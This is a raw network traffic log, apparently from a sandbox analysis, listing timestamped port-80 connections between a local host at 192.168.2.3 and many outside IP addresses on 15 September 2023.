                                                                                                                                                                              Sep 15, 2023 07:26:25.317017078 CEST804982496.127.180.42192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.318078041 CEST804982496.127.180.42192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.318155050 CEST4982480192.168.2.396.127.180.42
                                                                                                                                                                              Sep 15, 2023 07:26:25.333249092 CEST4982680192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.411221027 CEST804982713.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.411758900 CEST804982713.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.411817074 CEST4982780192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:25.430151939 CEST804982654.209.32.212192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.434016943 CEST4982480192.168.2.396.127.180.42
                                                                                                                                                                              Sep 15, 2023 07:26:25.435007095 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.438106060 CEST4982780192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:25.475043058 CEST8049821170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.532267094 CEST804982854.209.32.212192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.532401085 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.532751083 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.544100046 CEST804982496.127.180.42192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.544166088 CEST4982480192.168.2.396.127.180.42
                                                                                                                                                                              Sep 15, 2023 07:26:25.546294928 CEST804982713.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.547931910 CEST804982713.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.547998905 CEST4982780192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:25.561697960 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:25.573296070 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.602727890 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.616856098 CEST8049821170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.616934061 CEST4982180192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:25.629223108 CEST804982854.209.32.212192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.629261017 CEST804982854.209.32.212192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.629323006 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.629323006 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.657686949 CEST4982880192.168.2.354.209.32.212
                                                                                                                                                                              Sep 15, 2023 07:26:25.663902044 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.664005995 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.690888882 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.690954924 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.690978050 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:25.690999031 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.691032887 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:25.691040993 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.691066980 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:25.691095114 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:25.723579884 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.754312038 CEST804982854.209.32.212192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.814253092 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.858906031 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.858967066 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.859002113 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.859030008 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.878365040 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.878592968 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:25.880606890 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:25.881516933 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:25.881582975 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.909580946 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:25.929430962 CEST8049764104.247.81.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.929629087 CEST4976480192.168.2.3104.247.81.50
                                                                                                                                                                              Sep 15, 2023 07:26:25.972098112 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.992983103 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.993099928 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:25.993135929 CEST8049830172.67.134.134192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:25.993185043 CEST4983080192.168.2.3172.67.134.134
                                                                                                                                                                              Sep 15, 2023 07:26:26.001292944 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001332998 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001415014 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001441002 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001477957 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001513958 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001557112 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001559019 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001601934 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001636982 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001689911 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001744986 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001795053 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.001885891 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.001934052 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.006373882 CEST8049832208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.006449938 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.018733025 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.029858112 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.039659023 CEST804978093.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.039738894 CEST4978080192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:26.075651884 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.115463018 CEST8049832208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.116390944 CEST8049832208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.116471052 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.117260933 CEST8049832208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.117319107 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.132863045 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.135615110 CEST4983280192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.136339903 CEST4983680192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.140321970 CEST804983399.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.140448093 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.140760899 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.149147034 CEST8049831211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.149219036 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:26.149498940 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:26.167097092 CEST4983780192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:26.199609041 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.199654102 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.199687004 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.199691057 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.199717999 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.199731112 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.199748993 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.199788094 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.208092928 CEST804979170.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.208164930 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:26.231951952 CEST8049832208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.232800007 CEST8049836208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.233092070 CEST4983680192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.233231068 CEST4983680192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.248850107 CEST804983399.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.249197960 CEST804983399.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.249366045 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.257091999 CEST804983723.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.257169008 CEST4983780192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:26.262798071 CEST804983482.201.61.230192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.262877941 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.269655943 CEST4983780192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:26.269674063 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.270430088 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.297756910 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.297857046 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.298178911 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.312467098 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312545061 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312618971 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312653065 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312693119 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312693119 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312722921 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312771082 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312797070 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312895060 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312916040 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312952995 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.312974930 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.312994003 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313021898 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313059092 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313071966 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313102961 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313128948 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313165903 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313215971 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313235998 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313283920 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313307047 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313347101 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313406944 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313455105 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313569069 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313606977 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.313673973 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.313689947 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.330298901 CEST8049836208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.330995083 CEST8049836208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.331067085 CEST4983680192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.331713915 CEST8049836208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.331769943 CEST4983680192.168.2.3208.97.178.138
                                                                                                                                                                              Sep 15, 2023 07:26:26.335014105 CEST4981580192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:26.360012054 CEST804983723.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.378652096 CEST804983399.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.378885031 CEST804983399.84.160.31192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.378978968 CEST4983380192.168.2.399.84.160.31
                                                                                                                                                                              Sep 15, 2023 07:26:26.417465925 CEST8049831211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.417507887 CEST8049831211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.417582035 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:26.432147026 CEST804983723.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.432239056 CEST4983780192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:26.442044020 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:26.451272964 CEST804983482.201.61.230192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.464865923 CEST804983482.201.61.230192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.464903116 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.464962959 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.464973927 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.464991093 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.465029001 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.465039968 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.465063095 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.465074062 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.465135098 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.465162039 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.465243101 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.465528965 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:26.467617035 CEST8049766213.186.33.40192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.467689037 CEST4976680192.168.2.3213.186.33.40
                                                                                                                                                                              Sep 15, 2023 07:26:26.472910881 CEST804979480.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.473035097 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:26.516712904 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516781092 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516814947 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.516823053 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516849041 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.516863108 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516891956 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.516902924 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516910076 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.516943932 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516968012 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.516982079 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.516992092 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.517025948 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.517038107 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.517075062 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.524110079 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.602627993 CEST4983880192.168.2.3104.21.68.7
                                                                                                                                                                              Sep 15, 2023 07:26:26.624826908 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.624886990 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.624943972 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625022888 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625046968 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625072956 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625087023 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625119925 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625159979 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625178099 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625216007 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625296116 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625339985 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625387907 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625437021 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625462055 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625508070 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625535011 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625579119 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625605106 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625648975 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625688076 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625730991 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625757933 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625801086 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625870943 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625907898 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.625912905 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625952005 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.625984907 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626025915 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626055956 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626099110 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626164913 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626207113 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626260042 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626370907 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626374006 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626415014 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626487017 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626543045 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626588106 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626627922 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626633883 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626667976 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626698017 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626737118 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626780987 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626837015 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626878977 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626904964 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.626949072 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.626976967 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.627013922 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.627041101 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.627059937 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.627177954 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.627216101 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.627275944 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.627288103 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.627294064 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.627337933 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:26.639159918 CEST4983980192.168.2.3195.78.66.50
                                                                                                                                                                              Sep 15, 2023 07:26:26.660828114 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.660907984 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:26.693113089 CEST8049838104.21.68.7192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.694693089 CEST4983880192.168.2.3104.21.68.7
                                                                                                                                                                              Sep 15, 2023 07:26:26.694693089 CEST4983880192.168.2.3104.21.68.7
                                                                                                                                                                              Sep 15, 2023 07:26:26.710175037 CEST8049831211.1.226.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.710259914 CEST4983180192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:26.723856926 CEST4984080192.168.2.3198.100.146.220
                                                                                                                                                                              Sep 15, 2023 07:26:26.734905005 CEST804983482.201.61.230192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.734985113 CEST4983480192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:26.785351992 CEST8049838104.21.68.7192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.798182011 CEST4984180192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:26.798408985 CEST8049838104.21.68.7192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.798547983 CEST4983880192.168.2.3104.21.68.7
                                                                                                                                                                              Sep 15, 2023 07:26:26.799415112 CEST4983880192.168.2.3104.21.68.7
                                                                                                                                                                              Sep 15, 2023 07:26:26.833867073 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.833904028 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.833930969 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.833949089 CEST8049829154.203.14.100192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:26.833954096 CEST4982980192.168.2.3154.203.14.100
                                                                                                                                                                              Sep 15, 2023 07:26:26.833966970 CEST8049829154.203.14.100192.168.2.3
